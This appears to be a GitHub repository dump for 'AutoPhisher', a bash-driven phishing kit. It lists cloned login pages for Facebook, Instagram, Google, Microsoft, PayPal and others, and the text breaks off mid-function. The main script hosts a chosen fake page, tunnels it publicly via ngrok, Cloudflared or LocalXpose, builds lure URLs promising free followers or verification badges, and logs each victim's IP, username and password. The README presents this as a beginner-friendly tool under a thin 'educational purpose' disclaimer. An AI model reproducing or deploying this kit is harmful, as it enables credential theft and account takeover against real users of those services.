├── LICENSE ├── README.md ├── autophisher.sh ├── crkgithub ├── android.jpg ├── linuxlogo.jpg └── logo.jpg ├── scripts └── launch.sh └── sites ├── facebook ├── LICENSE ├── README.md ├── hsts-pixel.gif ├── index.php ├── login.html ├── login.php ├── logo.svg ├── mobile.html ├── script.js └── style.css ├── fb_advanced ├── index.php ├── login.html ├── login.php ├── login2.html └── result.html ├── fb_messenger ├── index.php ├── login.html └── login.php ├── fb_security ├── fb-ico.png ├── index.php ├── login.html ├── login.php ├── logo.png └── style.css ├── github ├── index.php ├── login.html └── login.php ├── google ├── avatar.png ├── google.png ├── index.php ├── login.html └── login.php ├── google_new ├── index.php ├── login.html └── login.php ├── google_poll ├── index.php ├── login.html ├── login.php ├── login2.html └── result.html ├── ig_followers ├── index.php ├── login.html └── login.php ├── ig_verify ├── index.php ├── login.html ├── login.php ├── login2.html ├── login2.php └── login3.html ├── insta_followers ├── index.php ├── login.html └── login.php ├── instagram ├── badge_android_english-en.png ├── badge_ios_english-en.png ├── favicon.png ├── home-phones.png ├── home-phones@2x.png ├── index.php ├── login.html ├── login.php ├── screenshot1.jpg ├── screenshot2.jpg ├── screenshot3.jpg ├── screenshot4.jpg ├── screenshot5.jpg ├── sprite_core_2x_bcd90c1d4868.png └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedin ├── 4li12pah6li7xka3r69y2hqap.css ├── 6jblk5oqhlo45xbkmcr7s4zix ├── 77qnm4uzm172xn82kvifmelfu ├── 9lb1g1kp916tat669q9r5g2kz ├── dnz8biurbtozxjvxufs5aq4jd ├── dz6wk4o93mwzoh0t6zsx73kzr ├── index.php ├── login.html └── login.php ├── mediafire ├── index.php ├── login.html └── login.php ├── microsoft ├── ConvergedLoginPaginatedStrings.EN.js ├── ConvergedLoginPaginatedStrings.js ├── ConvergedLogin_PCore.js ├── Converged_v21033.css ├── Converged_v21033.css2 ├── boot.css ├── boot.js ├── boot_002.js ├── boot_003.js ├── boot_004.js ├── ellipsis_grey.svg ├── ellipsis_white.svg ├── index.php ├── login.html ├── login.php ├── microsoft_logo.svg ├── prefetch.html ├── sprite1.css └── sprite1.png ├── paypal ├── index.php ├── login.html └── login.php ├── snapchat ├── index.php ├── login.php └── users.php ├── spotify ├── analytics.js ├── anchor.html ├── api.js ├── bframe.html ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js ├── index.css ├── index.js ├── index.php ├── login.html ├── login.php ├── recaptcha__en.js └── styles__ltr.css └── twitter ├── index.php ├── login.html └── login.php /README.md: -------------------------------------------------------------------------------- 1 | # AutoPhisher 2 | 3 | ![](https://github.com/CodingRanjith/autophisher/blob/main/crkgithub/logo.jpg) 4 | 5 | ## An automated Social Media phishing toolkit. 6 | This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit ! 7 | 8 | # DISCLAIMER 9 | 10 | The use of the autophisher & its resources/phishing-pages is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Also we inform you that some of your your actions may be ILLEGAL and you CAN NOT use this software to test person or company without WRITTEN PERMISSION from them. 11 | 12 | # FEATURES 13 | 14 | - Latest and updated login pages every month 15 | - Beginner Friendly 16 | - Multiple Tunneling optoins 17 | * Localhost 18 | * CloudFlared 19 | * Ngrok(https://ngrok.com/) 20 | * LocalXpose(https://localxpos.io/) 21 | 22 | # Installation 23 | 24 | ### Kali Linux 25 | 26 | ![](https://github.com/CodingRanjith/autophisher/blob/main/crkgithub/linuxlogo.jpg) 27 | 28 | - `apt update` 29 | - `apt install git` 30 | 31 | git clone https://github.com/CodingRanjith/autophisher.git 32 | 33 | - `cd autophisher` 34 | - `bash autophisher.sh` 35 | 36 | ### Android Termux App 37 | 38 | ![](https://github.com/CodingRanjith/autophisher/blob/main/crkgithub/android.jpg) 39 | 40 | - `apt upgrade` 41 | - `apt install git` 42 | 43 | git clone https://github.com/CodingRanjith/autophisher.git 44 | 45 | - `ls` 46 | - `cd autophisher` 47 | - `bash autophisher.sh` 48 | 49 | # Licence 50 | 51 | GNU General Public License v3.0 52 | 53 | # Legal Notice 54 | 55 | * This software is provided for educational use only! The author will not be held responsible for any illegal activity by you. By using this software, you agree to these terms. 56 | 57 | # Donate! 58 | 59 | ### PayPal: https://bit.ly/3QKknix 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /autophisher.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## autophisher : Automated Phishing Tool 4 | ## Author : CODING RANJITH 5 | ## Version : 2.0 6 | ## Github : https://github.com/CodingRanjith/autophisher 7 | 8 | 9 | 10 | ## 11 | ## Copyright (C) 2022 CODING RANJITH (https://github.com/CodingRanjith/autophisher) 12 | ## 13 | 14 | 15 | 16 | __version__="2.0" 17 | 18 | ## ANSI colors (FG & BG) 19 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" ORANGE="$(printf '\033[33m')" BLUE="$(printf '\033[34m')" 20 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')" 21 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" ORANGEBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')" 22 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')" 23 | RESETBG="$(printf '\e[0m\n')" 24 | 25 | ## Directories - Coding Ranjith 26 | if [[ ! -d ".server" ]]; then 27 | mkdir -p ".server" 28 | fi 29 | 30 | if [[ ! -d "auth" ]]; then 31 | mkdir -p "auth" 32 | fi 33 | 34 | if [[ -d ".server/www" ]]; then 35 | rm -rf ".server/www" 36 | mkdir -p ".server/www" 37 | else 38 | mkdir -p ".server/www" 39 | fi 40 | 41 | ## Remove logfile - Coding Ranjith 42 | if [[ -e ".server/.loclx" ]]; then 43 | rm -rf ".server/.loclx" 44 | fi 45 | 46 | if [[ -e ".server/.cld.log" ]]; then 47 | rm -rf ".server/.cld.log" 48 | fi 49 | 50 | ## Script termination 51 | exit_on_signal_SIGINT() { 52 | { printf "\n\n%s\n\n" "${WHITE}[${GREEN}!${WHITE}]${BLUE} Program Interrupted." 2>&1; reset_color; } 53 | exit 0 54 | } 55 | 56 | exit_on_signal_SIGTERM() { 57 | { printf "\n\n%s\n\n" "${WHITE}[${GREEN}!${WHITE}]${BLUE} Program Terminated." 2>&1; reset_color; } 58 | exit 0 59 | } 60 | 61 | trap exit_on_signal_SIGINT SIGINT 62 | trap exit_on_signal_SIGTERM SIGTERM 63 | 64 | ## Reset terminal colors 65 | reset_color() { 66 | tput sgr0 # reset attributes 67 | tput op # reset color 68 | return 69 | } 70 | 71 | ## Kill already running process 72 | kill_pid() { 73 | check_PID="php ngrok cloudflared loclx" 74 | for process in ${check_PID}; do 75 | if [[ $(pidof ${process}) ]]; then # Check for Process 76 | killall ${process} > /dev/null 2>&1 # Kill the Process 77 | fi 78 | done 79 | } 80 | 81 | ## Banner 82 | banner() { 83 | cat <<- EOF 84 | 85 | ${GREEN}░█████╗░██╗░░░██╗████████╗░█████╗░██████╗░██╗░░██╗██╗░██████╗██╗░░██╗███████╗██████╗░ 86 | ${GREEN}██╔══██╗██║░░░██║╚══██╔══╝██╔══██╗██╔══██╗██║░░██║██║██╔════╝██║░░██║██╔════╝██╔══██╗ 87 | ${GREEN}███████║██║░░░██║░░░██║░░░██║░░██║██████╔╝███████║██║╚█████╗░███████║█████╗░░██████╔╝ 88 | ${GREEN}██╔══██║██║░░░██║░░░██║░░░██║░░██║██╔═══╝░██╔══██║██║░╚═══██╗██╔══██║██╔══╝░░██╔══██╗ 89 | ${GREEN}██║░░██║╚██████╔╝░░░██║░░░╚█████╔╝██║░░░░░██║░░██║██║██████╔╝██║░░██║███████╗██║░░██║ 90 | ${GREEN}╚═╝░░╚═╝░╚═════╝░░░░╚═╝░░░░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═╝╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝ 91 | ${GREEN} 92 | ${BLUE}Version : ${__version__} 93 | 94 | ${GREEN}[${WHITE}-${GREEN}]${CYAN} Tool Created by CODING RANJITH (C.RANJITH KUMAR)${WHITE} 95 | EOF 96 | } 97 | 98 | ## Small Banner 99 | banner_small() { 100 | cat <<- EOF 101 | ${BLUE}█████████████████████████████████████████████████████████████ 102 | ${BLUE}██▀▄─██▄─██─▄█─▄─▄─█─▄▄─█▄─▄▄─█─█─█▄─▄█─▄▄▄▄█─█─█▄─▄▄─█▄─▄▄▀█ 103 | ${BLUE}██─▀─███─██─████─███─██─██─▄▄▄█─▄─██─██▄▄▄▄─█─▄─██─▄█▀██─▄─▄█ 104 | ${BLUE}▀▄▄▀▄▄▀▀▄▄▄▄▀▀▀▄▄▄▀▀▄▄▄▄▀▄▄▄▀▀▀▄▀▄▀▄▄▄▀▄▄▄▄▄▀▄▀▄▀▄▄▄▄▄▀▄▄▀▄▄▀ ${WHITE} ${__version__} 105 | EOF 106 | } 107 | 108 | ## Dependencies 109 | dependencies() { 110 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing required packages..." 111 | 112 | if [[ -d "/data/data/com.termux/files/home" ]]; then 113 | if [[ ! $(command -v proot) ]]; then 114 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}proot${CYAN}"${WHITE} 115 | pkg install proot resolv-conf -y 116 | fi 117 | 118 | if [[ ! $(command -v tput) ]]; then 119 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}ncurses-utils${CYAN}"${WHITE} 120 | pkg install ncurses-utils -y 121 | fi 122 | fi 123 | 124 | if [[ $(command -v php) && $(command -v curl) && $(command -v unzip) ]]; then 125 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Packages already installed." 126 | else 127 | pkgs=(php curl unzip) 128 | for pkg in "${pkgs[@]}"; do 129 | type -p "$pkg" &>/dev/null || { 130 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}$pkg${CYAN}"${WHITE} 131 | if [[ $(command -v pkg) ]]; then 132 | pkg install "$pkg" -y 133 | elif [[ $(command -v apt) ]]; then 134 | sudo apt install "$pkg" -y 135 | elif [[ $(command -v apt-get) ]]; then 136 | sudo apt-get install "$pkg" -y 137 | elif [[ $(command -v pacman) ]]; then 138 | sudo pacman -S "$pkg" --noconfirm 139 | elif [[ $(command -v dnf) ]]; then 140 | sudo dnf -y install "$pkg" 141 | elif [[ $(command -v yum) ]]; then 142 | sudo yum -y install "$pkg" 143 | else 144 | echo -e "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Unsupported package manager, Install packages manually." 145 | { reset_color; exit 1; } 146 | fi 147 | } 148 | done 149 | fi 150 | } 151 | 152 | # Download Binaries 153 | download() { 154 | url="$1" 155 | output="$2" 156 | file=`basename $url` 157 | if [[ -e "$file" || -e "$output" ]]; then 158 | rm -rf "$file" "$output" 159 | fi 160 | curl --silent --insecure --fail --retry-connrefused \ 161 | --retry 3 --retry-delay 2 --location --output "${file}" "${url}" 162 | 163 | if [[ -e "$file" ]]; then 164 | if [[ ${file#*.} == "zip" ]]; then 165 | unzip -qq $file > /dev/null 2>&1 166 | mv -f $output .server/$output > /dev/null 2>&1 167 | elif [[ ${file#*.} == "tgz" ]]; then 168 | tar -zxf $file > /dev/null 2>&1 169 | mv -f $output .server/$output > /dev/null 2>&1 170 | else 171 | mv -f $file .server/$output > /dev/null 2>&1 172 | fi 173 | chmod +x .server/$output > /dev/null 2>&1 174 | rm -rf "$file" 175 | else 176 | echo -e "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Error occured while downloading ${output}." 177 | { reset_color; exit 1; } 178 | fi 179 | } 180 | 181 | ## Install ngrok 182 | install_ngrok() { 183 | if [[ -e ".server/ngrok" ]]; then 184 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Ngrok already installed." 185 | else 186 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing ngrok..."${WHITE} 187 | arch=`uname -m` 188 | if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then 189 | download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm.tgz' 'ngrok' 190 | elif [[ "$arch" == *'aarch64'* ]]; then 191 | download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz' 'ngrok' 192 | elif [[ "$arch" == *'x86_64'* ]]; then 193 | download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz' 'ngrok' 194 | else 195 | download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-386.tgz' 'ngrok' 196 | fi 197 | fi 198 | } 199 | 200 | ## Install Cloudflared 201 | install_cloudflared() { 202 | if [[ -e ".server/cloudflared" ]]; then 203 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Cloudflared already installed." 204 | else 205 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing Cloudflared..."${WHITE} 206 | arch=`uname -m` 207 | if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then 208 | download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm' 'cloudflared' 209 | elif [[ "$arch" == *'aarch64'* ]]; then 210 | download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64' 'cloudflared' 211 | elif [[ "$arch" == *'x86_64'* ]]; then 212 | download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64' 'cloudflared' 213 | else 214 | download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-386' 'cloudflared' 215 | fi 216 | fi 217 | } 218 | 219 | ## Install LocalXpose 220 | install_localxpose() { 221 | if [[ -e ".server/loclx" ]]; then 222 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} LocalXpose already installed." 223 | else 224 | echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing LocalXpose..."${WHITE} 225 | arch=`uname -m` 226 | if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then 227 | download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm.zip' 'loclx' 228 | elif [[ "$arch" == *'aarch64'* ]]; then 229 | download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm64.zip' 'loclx' 230 | elif [[ "$arch" == *'x86_64'* ]]; then 231 | download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-amd64.zip' 'loclx' 232 | else 233 | download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-386.zip' 'loclx' 234 | fi 235 | fi 236 | } 237 | 238 | ## Exit message 239 | msg_exit() { 240 | { clear; banner; echo; } 241 | echo -e "${GREENBG}${BLACK} Thank you for using this tool. Have a good day.${RESETBG}\n" 242 | { reset_color; exit 0; } 243 | } 244 | 245 | ## About 246 | about() { 247 | { clear; banner; echo; } 248 | cat <<- EOF 249 | ${GREEN} Author ${RED}: ${ORANGE}C.RANJITH KUMAR ${RED}[ ${ORANGE}CODING RANJITH ${RED}] 250 | ${GREEN} Github ${RED}: ${CYAN}https://github.com/CodingRanjith/autophisher 251 | ${GREEN} Social ${RED}: ${CYAN}https://techackode.blogspot.com 252 | ${GREEN} Version ${RED}: ${ORANGE}${__version__} 253 | 254 | ${WHITE} ${REDBG}Warning:${RESETBG} 255 | ${CYAN} This Tool is made for educational purpose 256 | only ${RED}!${WHITE}${CYAN} Author will not be responsible for 257 | any misuse of this toolkit ${RED}!${WHITE} 258 | 259 | 260 | ${WHITE}[${GREEN}00${WHITE}]${BLUE} Main Menu ${WHITE}[${GREEN}99${WHITE}]${BLUE} Exit 261 | 262 | EOF 263 | 264 | read -p "${WHITE}[${GREEN}-${WHITE}]${BLUE} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉 𝙊𝙋𝙏𝙄𝙊𝙉 : ${BLUE}" 265 | case $REPLY in 266 | 99) 267 | msg_exit;; 268 | 0 | 00) 269 | echo -ne "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Returning to main menu..." 270 | { sleep 1; main_menu; };; 271 | *) 272 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 273 | { sleep 1; about; };; 274 | esac 275 | } 276 | 277 | ## Setup website and start php server 278 | HOST='127.0.0.1' 279 | PORT='8080' 280 | 281 | setup_site() { 282 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Setting up server..."${WHITE} 283 | cp -rf sites/"$website"/* .server/www 284 | cp -f sites/ip.php .server/www/ 285 | echo -ne "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Starting PHP server..."${WHITE} 286 | cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 & 287 | } 288 | 289 | ## Get IP address 290 | capture_ip() { 291 | IP=$(grep -a 'IP:' .server/www/ip.txt | cut -d " " -f2 | tr -d '\r') 292 | IFS=$'\n' 293 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Victim's IP : ${BLUE}$IP" 294 | echo -ne "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Saved in : ${ORANGE}auth/ip.txt" 295 | cat .server/www/ip.txt >> auth/ip.txt 296 | } 297 | 298 | ## Get credentials 299 | capture_creds() { 300 | ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | awk '{print $2}') 301 | PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | awk -F ":." '{print $NF}') 302 | IFS=$'\n' 303 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Account : ${ORANGE}$ACCOUNT" 304 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Password: ${ORANGE}$PASSWORD" 305 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Saved in : ${ORANGE}auth/usernames.dat" 306 | cat .server/www/usernames.txt >> auth/usernames.dat 307 | echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. " 308 | } 309 | 310 | ## Print data 311 | capture_data() { 312 | echo -ne "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Waiting for Login Info, ${ORANGE}Ctrl + C ${BLUE}to exit..." 313 | while true; do 314 | if [[ -e ".server/www/ip.txt" ]]; then 315 | echo -e "\n\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Victim IP Found !" 316 | capture_ip 317 | rm -rf .server/www/ip.txt 318 | fi 319 | sleep 0.75 320 | if [[ -e ".server/www/usernames.txt" ]]; then 321 | echo -e "\n\n${WHITE}[${GREEN}-${WHITE}]${ORANGE} Login info Found !!" 322 | capture_creds 323 | rm -rf .server/www/usernames.txt 324 | fi 325 | sleep 0.75 326 | done 327 | } 328 | 329 | ## Start ngrok 330 | start_ngrok() { 331 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})" 332 | { sleep 1; setup_site; } 333 | echo -e "\n" 334 | read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Ngrok Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion 335 | [[ ${opinion,,} == "y" ]] && ngrok_region="eu" || ngrok_region="us" 336 | echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Ngrok..." 337 | 338 | if [[ `command -v termux-chroot` ]]; then 339 | sleep 2 && termux-chroot ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 & 340 | else 341 | sleep 2 && ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 & 342 | fi 343 | 344 | { sleep 8; clear; banner_small; } 345 | ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -Eo '(https)://[^/"]+(.ngrok.io)') 346 | ngrok_url1=${ngrok_url#https://} 347 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 1 : ${ORANGE}$ngrok_url" 348 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 2 : ${ORANGE}$mask@$ngrok_url1" 349 | capture_data 350 | } 351 | 352 | ## Start Cloudflared 353 | start_cloudflared() { 354 | rm .cld.log > /dev/null 2>&1 & 355 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Initializing... ${ORANGE}( ${CYAN}http://$HOST:$PORT ${ORANGE})" 356 | { sleep 1; setup_site; } 357 | echo -ne "\n\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Launching Cloudflared..." 358 | 359 | if [[ `command -v termux-chroot` ]]; then 360 | sleep 2 && termux-chroot ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 & 361 | else 362 | sleep 2 && ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 & 363 | fi 364 | 365 | { sleep 8; clear; banner_small; } 366 | 367 | cldflr_link=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".server/.cld.log") 368 | cldflr_link1=${cldflr_link#https://} 369 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 1 : ${ORANGE}$cldflr_link" 370 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 2 : ${ORANGE}$mask@$cldflr_link1" 371 | capture_data 372 | } 373 | 374 | localxpose_auth() { 375 | ./.server/loclx -help > /dev/null 2>&1 & 376 | sleep 1 377 | [ -d ".localxpose" ] && auth_f=".localxpose/.access" || auth_f="$HOME/.localxpose/.access" 378 | 379 | [ "$(./.server/loclx account status | grep Error)" ] && { 380 | echo -e "\n\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Create an account on ${ORANGE}localxpose.io${GREEN} & copy the token\n" 381 | sleep 3 382 | read -p "${WHITE}[${GREEN}-${WHITE}]${ORANGE} Input Loclx Token :${ORANGE} " loclx_token 383 | [[ $loclx_token == "" ]] && { 384 | echo -e "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} You have to input Localxpose Token." ; sleep 2 ; tunnel_menu 385 | } || { 386 | echo -n "$loclx_token" > $auth_f 2> /dev/null 387 | } 388 | } 389 | } 390 | 391 | ## Start LocalXpose (Again...) 392 | start_loclx() { 393 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Initializing... ${CYAN}( ${ORANGE}http://$HOST:$PORT ${CYAN})" 394 | { sleep 1; setup_site; localxpose_auth; } 395 | echo -e "\n" 396 | read -n1 -p "${WHITE}[${GREEN}-${WHITE}]${BLUE} Change Loclx Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion 397 | [[ ${opinion,,} == "y" ]] && loclx_region="eu" || loclx_region="us" 398 | echo -e "\n\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Launching LocalXpose..." 399 | 400 | if [[ `command -v termux-chroot` ]]; then 401 | sleep 1 && termux-chroot ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 & 402 | else 403 | sleep 1 && ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 & 404 | fi 405 | 406 | { sleep 12; clear; banner_small; } 407 | loclx_url=$(cat .server/.loclx | grep -Eo '[-0-9a-z]+.[-0-9a-z]+(.loclx.io)') # Somebody fix this crappy regex :( 408 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 1 : ${ORANGE}http://$loclx_url" 409 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} URL 2 : ${ORANGE}$mask@$loclx_url" 410 | capture_data 411 | } 412 | 413 | ## Start localhost 414 | start_localhost() { 415 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Initializing... ${GREEN}( ${ORANGE}http://$HOST:$PORT ${GREEN})" 416 | setup_site 417 | { sleep 1; clear; banner_small; } 418 | echo -e "\n${WHITE}[${GREEN}-${WHITE}]${BLUE} Successfully Hosted at : ${GREEN}${ORANGE}http://$HOST:$PORT ${GREEN}" 419 | capture_data 420 | } 421 | 422 | ## Tunnel selection 423 | tunnel_menu() { 424 | { clear; banner_small; } 425 | cat <<- EOF 426 | 427 | ${WHITE}[${GREEN}01${WHITE}]${BLUE} Localhost 428 | ${WHITE}[${GREEN}02${WHITE}]${BLUE} Ngrok.io ${WHITE}[${ORANGE}Account Needed${WHITE}] 429 | ${WHITE}[${GREEN}03${WHITE}]${BLUE} Cloudflared ${WHITE}[${ORANGE}Auto Detects${WHITE}] 430 | ${WHITE}[${GREEN}04${WHITE}]${BLUE} LocalXpose ${WHITE}[${ORANGE}NEW! Max 15Min${WHITE}] 431 | 432 | EOF 433 | 434 | read -p "${WHITE}[${GREEN}-${WHITE}]${RED} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼 𝙋𝙊𝙍𝙏 𝙁𝙊𝙍𝙒𝘼𝙍𝘿𝙄𝙉𝙂 𝙎𝙀𝙍𝙑𝙄𝘾𝙀 : ${RED}" 435 | 436 | case $REPLY in 437 | 1 | 01) 438 | start_localhost;; 439 | 2 | 02) 440 | start_ngrok;; 441 | 3 | 03) 442 | start_cloudflared;; 443 | 4 | 04) 444 | start_loclx;; 445 | *) 446 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 447 | { sleep 1; tunnel_menu; };; 448 | esac 449 | } 450 | 451 | ## Facebook 452 | site_facebook() { 453 | cat <<- EOF 454 | 455 | ${WHITE}[${GREEN}01${WHITE}]${BLUE} Traditional Login Page 456 | ${WHITE}[${GREEN}02${WHITE}]${BLUE} Advanced Voting Poll Login Page 457 | ${WHITE}[${GREEN}03${WHITE}]${BLUE} Fake Security Login Page 458 | ${WHITE}[${GREEN}04${WHITE}]${BLUE} Facebook Messenger Login Page 459 | 460 | EOF 461 | 462 | read -p "${WHITE}[${GREEN}-${WHITE}]${RED} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉 𝙊𝙋𝙏𝙄𝙊𝙉 : ${RED}" 463 | 464 | case $REPLY in 465 | 1 | 01) 466 | website="facebook" 467 | mask='http://blue-verified-badge-for-facebook-free' 468 | tunnel_menu;; 469 | 2 | 02) 470 | website="fb_advanced" 471 | mask='http://vote-for-the-best-social-media' 472 | tunnel_menu;; 473 | 3 | 03) 474 | website="fb_security" 475 | mask='http://make-your-facebook-secured-and-free-from-hackers' 476 | tunnel_menu;; 477 | 4 | 04) 478 | website="fb_messenger" 479 | mask='http://get-messenger-premium-features-free' 480 | tunnel_menu;; 481 | *) 482 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 483 | { sleep 1; clear; banner_small; site_facebook; };; 484 | esac 485 | } 486 | 487 | ## Instagram 488 | site_instagram() { 489 | cat <<- EOF 490 | 491 | ${WHITE}[${GREEN}01${WHITE}]${BLUE} Traditional Login Page 492 | ${WHITE}[${GREEN}02${WHITE}]${BLUE} Auto Followers Login Page 493 | ${WHITE}[${GREEN}03${WHITE}]${BLUE} 1000 Followers Login Page 494 | ${WHITE}[${GREEN}04${WHITE}]${BLUE} Blue Badge Verify Login Page 495 | 496 | EOF 497 | 498 | read -p "${WHITE}[${GREEN}-${WHITE}]${RED} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉 𝙊𝙋𝙏𝙄𝙊𝙉 : ${RED}" 499 | 500 | case $REPLY in 501 | 1 | 01) 502 | website="instagram" 503 | mask='http://get-unlimited-followers-for-instagram' 504 | tunnel_menu;; 505 | 2 | 02) 506 | website="ig_followers" 507 | mask='http://get-unlimited-followers-for-instagram' 508 | tunnel_menu;; 509 | 3 | 03) 510 | website="insta_followers" 511 | mask='http://get-1000-followers-for-instagram' 512 | tunnel_menu;; 513 | 4 | 04) 514 | website="ig_verify" 515 | mask='http://blue-badge-verify-for-instagram-free' 516 | tunnel_menu;; 517 | *) 518 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 519 | { sleep 1; clear; banner_small; site_instagram; };; 520 | esac 521 | } 522 | 523 | ## Gmail/Google 524 | site_gmail() { 525 | cat <<- EOF 526 | 527 | ${WHITE}[${GREEN}01${WHITE}]${BLUE} Gmail Old Login Page 528 | ${WHITE}[${GREEN}02${WHITE}]${BLUE} Gmail New Login Page 529 | ${WHITE}[${GREEN}03${WHITE}]${BLUE} Advanced Voting Poll 530 | 531 | EOF 532 | 533 | read -p "${WHITE}[${GREEN}-${WHITE}]${RED} 𝙎𝙀𝙇𝙀𝘾𝙏 𝘼𝙉 𝙊𝙋𝙏𝙄𝙊𝙉 : ${RED}" 534 | 535 | case $REPLY in 536 | 1 | 01) 537 | website="google" 538 | mask='http://get-unlimited-google-drive-free' 539 | tunnel_menu;; 540 | 2 | 02) 541 | website="google_new" 542 | mask='http://get-unlimited-google-drive-free' 543 | tunnel_menu;; 544 | 3 | 03) 545 | website="google_poll" 546 | mask='http://vote-for-the-best-social-media' 547 | tunnel_menu;; 548 | *) 549 | echo -ne "\n${WHITE}[${GREEN}!${WHITE}]${BLUE} Invalid Option, Try Again..." 550 | { sleep 1; clear; banner_small; 